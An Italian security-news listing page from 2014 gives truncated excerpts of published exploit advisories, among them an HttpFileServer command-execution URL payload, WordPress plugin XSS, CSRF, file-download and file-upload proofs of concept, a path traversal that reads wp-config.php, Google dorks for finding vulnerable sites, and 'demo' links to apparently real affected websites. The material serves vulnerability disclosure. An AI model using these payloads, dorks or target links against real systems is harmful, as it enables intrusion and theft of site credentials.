HttpFileServer 2.3.x Remote Command Execution

16 settembre 2014 - Fonte: http://www.mondounix.com
ffected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
issue exists due to a poor regex in the file ParserLib.pas
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
it will not handle null byte so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
will...

Leggi il seguito »

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 settembre 2014 - Fonte: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...

Leggi il seguito »

WordPress Plugin Vulnerability Dump – Part 2

10 settembre 2014 - Fonte: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Leggi il seguito »

WordPress Bulk Delete Users By Email 1.0 CSRF

9 settembre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...

Leggi il seguito »

WordPress Advanced Access Manager 2.8.2 File Write / Code Execution

4 settembre 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Advanced Access Manager
Version: 2.8.2
Homepage: http://wordpress.org/plugins/advanced-access-manager/
Advisory report: https://security.dxw.com/advisories/advanced-access-manager-allows-admin-users-to-write-arbitrary-text-to-arbitrary-locations-which-could-lead-to-arbitrary-code-execution-etc/
CVE: CVE-2014-6059
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Advanced Access Manager allows admin users to write arbitrary files and execute arbitrary php
 
Vulnerability
================
Advanced Access Manager allows writing arbitrary content to arbitrary files. Depending on the server configuration this could allow arbitrary code execution, overwriting core...

Leggi il seguito »

NRPE 2.15 Remote Command Execution

31 agosto 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
#
# Exploit Title : NRPE < = 2.15 Remote Code Execution Vulnerability
#
# Discovered by  : Dawid Golunski
#                  dawid (at) legalhackers (dot) com
#                  legalhackers.com
#
# Exploit Author : Claudio Viviani
#                  http://www.homelab.it
#
#                  info@homelab.it
#                  homelabit@protonmail.ch
#
#                  https://www.facebook.com/homelabit
#                  https://twitter.com/homelabit
#                  https://plus.google.com/+HomelabIt1/
#                  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#
#
#
# C crc32 function ripped from check_nrpe_clone by Alan Brenner 
#                                       http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library...

Leggi il seguito »

WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 agosto 2014 - Fonte: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 de Julio del 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Archivos Afectados.
 
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS
CODE]
 
Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>
 
Variable Afectada: $idx
Fix:...

Leggi il seguito »